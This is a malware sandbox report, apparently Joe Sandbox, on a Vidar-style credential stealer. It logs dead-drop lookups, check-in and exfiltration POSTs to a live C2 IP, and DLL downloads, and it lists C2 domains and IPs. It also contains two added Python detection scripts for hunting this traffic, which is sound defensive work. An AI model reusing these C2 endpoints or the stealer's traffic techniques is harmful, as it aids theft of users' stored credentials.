Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 1025 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 461 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 109281 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
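The traffic above is the whole Vidar session in order: a User-Agent-less GET to each dead-drop resolver (the Steam profile and Telegram channel from the extracted configuration) to learn the live C2, then check-in POSTs to the bare IP 95.217.220.103 with a spoofed macOS Firefox User-Agent, then GETs for the NSS/MSVC DLL cluster, then the large exfiltration POST (109281 bytes). Every multipart boundary is "----" followed by exactly 20 letters drawn from A-K, which is what the ET "Stealer Style Headers In HTTP POST" alert keys on; the JA3 "Possible Dridex" alerts are severity 3 and corroborate rather than identify. The script below is an added example for retro-hunting proxy or Zeek HTTP logs, written for this report and not Joe Sandbox or Vidar code: it parses raw request heads, tags each request with the indicators it matches, and marks a host as C2 when it took a stealer-style POST and either is a bare IP or served three or more of the DLL cluster. The boundary regex is derived from the boundaries listed in this report, not from the ET rule text, and the sample requests and benign controls are constructed.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Boundary style seen in every POST in this report: "----" then exactly 20 letters A-K.
BOUNDARY_RE = re.compile(r"boundary=----[A-K]{20}$")
# Dead-drop resolvers from the extracted config: a Steam profile and a Telegram channel.
DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me"}
DEAD_DROP_PATH_RE = re.compile(r"^/(profiles/\d+|[A-Za-z0-9_]+)$")
# DLL cluster the sample fetched from its C2 after check-in (sqlp.dll plus the NSS and
# MSVC runtime DLLs needed to decrypt Firefox credential stores).
NSS_DLLS = {"sqlp.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
            "softokn3.dll", "vcruntime140.dll", "nss3.dll"}


@dataclass
class Request:
    method: str
    path: str
    headers: dict


def parse_request(raw: str) -> Request:
    """Parse a raw HTTP request head (request line plus headers, CRLF or LF)."""
    lines = [ln for ln in raw.replace("\r\n", "\n").split("\n") if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method.upper(), path, headers)


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP (optionally with :port), not a DNS name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def classify(req: Request) -> list:
    """Return the Vidar-style indicators a single request matches."""
    hits = []
    host = req.headers.get("host", "")
    ctype = req.headers.get("content-type", "")
    if (req.method == "POST" and ctype.startswith("multipart/form-data")
            and BOUNDARY_RE.search(ctype)):
        hits.append("stealer_multipart_boundary")
        if is_ip_literal(host):
            hits.append("post_to_bare_ip")
    # The dead-drop GETs in this report carry no User-Agent header at all.
    if (req.method == "GET" and host in DEAD_DROP_HOSTS
            and "user-agent" not in req.headers and DEAD_DROP_PATH_RE.match(req.path)):
        hits.append("dead_drop_resolver_no_ua")
    if req.method == "GET" and is_ip_literal(host) and req.path.lstrip("/").lower() in NSS_DLLS:
        hits.append("nss_dll_fetch_from_ip")
    return hits


def c2_candidates(raw_requests) -> dict:
    """Correlate per host. A host is marked as C2 when it took a stealer-style POST and
    either is a bare IP or served at least three DLLs from the cluster."""
    by_host = defaultdict(lambda: {"indicators": set(), "dlls": set()})
    for raw in raw_requests:
        req = parse_request(raw)
        host = req.headers.get("host", "")
        hits = classify(req)
        by_host[host]["indicators"].update(hits)
        if "nss_dll_fetch_from_ip" in hits:
            by_host[host]["dlls"].add(req.path.lstrip("/").lower())
    result = {}
    for host, info in by_host.items():
        ind = info["indicators"]
        result[host] = {
            "indicators": sorted(ind),
            "c2": ("stealer_multipart_boundary" in ind
                   and ("post_to_bare_ip" in ind or len(info["dlls"]) >= 3)),
        }
    return result


# Constructed request heads mirroring the session above, plus two benign controls.
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0"
SAMPLE_REQUESTS = [
    "GET /fun88rockskek HTTP/1.1\r\nHost: t.me\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n",
    "GET /profiles/76561199786602107 HTTP/1.1\r\nHost: steamcommunity.com\r\nConnection: Keep-Alive\r\n",
    f"POST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC\r\n"
    f"User-Agent: {UA}\r\nHost: 95.217.220.103\r\nContent-Length: 255\r\n",
    f"GET /freebl3.dll HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: 95.217.220.103\r\n",
    f"GET /nss3.dll HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: 95.217.220.103\r\n",
    f"GET /softokn3.dll HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: 95.217.220.103\r\n",
    # Benign controls: a browser upload with a WebKit boundary, and a real profile visit.
    "POST /upload HTTP/1.1\r\nContent-Type: multipart/form-data; "
    "boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\nHost: 198.51.100.7\r\n",
    f"GET /profiles/76561199786602107 HTTP/1.1\r\nHost: steamcommunity.com\r\nUser-Agent: {UA}\r\n",
]

if __name__ == "__main__":
    for host, verdict in c2_candidates(SAMPLE_REQUESTS).items():
        print(host, verdict)
```

Note that a visit to the same Steam profile or Telegram channel from a real browser carries a User-Agent and is not flagged; the resolver check is about the header shape, not the destination alone, which is why it should be paired with the boundary and DLL-fetch indicators before a host is escalated.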
Source: unknown TCP traffic detected without corresponding DNS query: 107.191.36.218 (5 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.220.103 (45 connections)
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00926963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_00926963
Source: global traffic HTTP traffic detected: GET /fun88rockskek HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 107.191.36.218 | Connection: Keep-Alive | Cache-Control: no-cache
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
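The network observations above carry four distinct detection points: TCP peers contacted with no preceding DNS answer, the t.me and steamcommunity.com page fetches sent with no User-Agent header at all, a macOS Firefox User-Agent used towards a bare IP from a Windows guest, a run of Firefox NSS/SQLite DLL downloads from that IP, and a multipart/form-data POST whose boundary is dashes followed by uppercase letters. The script below turns them into triage logic. It is an added example, not code from the report or from Joe Sandbox; it runs over constructed event records that mirror the report's entries, and the record layout, finding labels, the 3-DLL threshold and the TEST-NET addresses standing in for the t.me/steamcommunity.com resolutions (which the report does not show) are assumptions. Reading the Telegram and Steam requests as dead-drop resolver lookups is the pattern documented for Vidar, not a statement the report itself makes.

```python
"""Heuristic triage of sandbox network events for Vidar-style stealer traffic.

Added example, not part of the analysis report. Event records are constructed
to mirror the report; record layout, labels and thresholds are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass

# DLLs the report shows being fetched from the bare-IP host: the Firefox NSS /
# SQLite libraries a stealer needs to read stored logins (assumed purpose).
NSS_STACK = {"nss3.dll", "freebl3.dll", "mozglue.dll", "softokn3.dll", "sqlp.dll"}
# Public pages fetched before the IP was contacted: channel / profile lookups
# consistent with the dead-drop resolver pattern documented for Vidar.
DEAD_DROP_HOSTS = {
    "t.me": re.compile(r"^/[A-Za-z0-9_]+$"),
    "steamcommunity.com": re.compile(r"^/profiles/\d+$"),
}
# Boundary in the report: ----KEGDAKEHJDHIDHJJDAEC (dashes + uppercase letters).
MULTIPART_BOUNDARY = re.compile(r"^----[A-Z]{12,}$")

@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased

def parse_request(raw: str) -> HttpRequest:
    """Parse a raw request head ('GET /x HTTP/1.1\\r\\nHost: ...')."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)

def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal rather than a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False

def unresolved_connections(dns_queries, connections):
    """Peers contacted although no DNS answer named them (hard-coded or
    dead-drop-derived C2): the report's 'TCP traffic without DNS query'."""
    resolved = {ip for _name, ips in dns_queries for ip in ips}
    return sorted({ip for ip in connections if ip not in resolved})

def triage(dns_queries, connections, raw_requests):
    """Return de-duplicated finding labels in order of first occurrence."""
    findings = []
    def add(label):
        if label not in findings:
            findings.append(label)
    for ip in unresolved_connections(dns_queries, connections):
        add(f"tcp-without-dns:{ip}")
    fetched = {}  # bare-IP host -> NSS_STACK names downloaded from it
    for req in map(parse_request, raw_requests):
        host = req.headers.get("host", "")
        ua = req.headers.get("user-agent")
        pattern = DEAD_DROP_HOSTS.get(host)
        # The report's t.me / steamcommunity.com requests carry no User-Agent.
        if pattern and pattern.match(req.path) and ua is None:
            add(f"dead-drop-lookup:{host}{req.path}")
        if not is_bare_ip(host):
            continue
        if ua and "Macintosh" in ua:  # macOS client string from a Windows guest
            add(f"spoofed-mac-ua:{host}")
        name = req.path.rsplit("/", 1)[-1].lower()
        if name in NSS_STACK:
            fetched.setdefault(host, set()).add(name)
        ctype = req.headers.get("content-type", "")
        if req.method == "POST" and ctype.startswith("multipart/form-data"):
            match = re.search(r"boundary=(\S+)", ctype)
            if match and MULTIPART_BOUNDARY.match(match.group(1)):
                add(f"multipart-exfil:{host}")
    for host, names in fetched.items():
        if len(names) >= 3:  # threshold is an assumption
            add(f"nss-stack-download:{host}:{len(names)}")
    return findings

# Constructed sample events mirroring the report. TEST-NET addresses stand in
# for the real t.me / steamcommunity.com answers, which the report does not show.
SAMPLE_DNS = [("t.me", ["203.0.113.10"]), ("steamcommunity.com", ["203.0.113.20"])]
SAMPLE_CONNECTIONS = ["203.0.113.10", "203.0.113.20", "95.217.220.103", "95.217.220.103"]
MAC_UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0"

def _c2_get(path):
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {MAC_UA}\r\nHost: 95.217.220.103"
            "\r\nConnection: Keep-Alive\r\nCache-Control: no-cache")

SAMPLE_REQUESTS = [
    "GET /fun88rockskek HTTP/1.1\r\nHost: t.me\r\nConnection: Keep-Alive\r\nCache-Control: no-cache",
    "GET /profiles/76561199786602107 HTTP/1.1\r\nHost: steamcommunity.com\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache",
] + [_c2_get(p) for p in ("/", "/sqlp.dll", "/freebl3.dll", "/mozglue.dll", "/msvcp140.dll",
                         "/softokn3.dll", "/vcruntime140.dll", "/nss3.dll")] + [
    "POST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC"
    f"\r\nUser-Agent: {MAC_UA}\r\nHost: 95.217.220.103\r\nContent-Length: 255"
    "\r\nConnection: Keep-Alive\r\nCache-Control: no-cache",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_DNS, SAMPLE_CONNECTIONS, SAMPLE_REQUESTS):
        print(finding)
```

The unresolved-peer and spoofed-User-Agent checks generalise beyond this sample, but both need context before they are alertable: hosts that legitimately talk to hard-coded addresses (NTP pools, CDN edges pinned by IP) will trip the first, and the second only holds when the OS of the source host is known. The DLL-set check is the most specific signal here, since a process other than Firefox pulling nss3.dll, freebl3.dll, mozglue.dll and softokn3.dll from one bare-IP host has essentially no benign explanation.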
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.191.36.218/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.191.36.218/0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.191.36.218/b
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.191.36.218/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.191.36.218:80
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.ECBGCBFHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.FHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgJJK
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoBFHIJJK
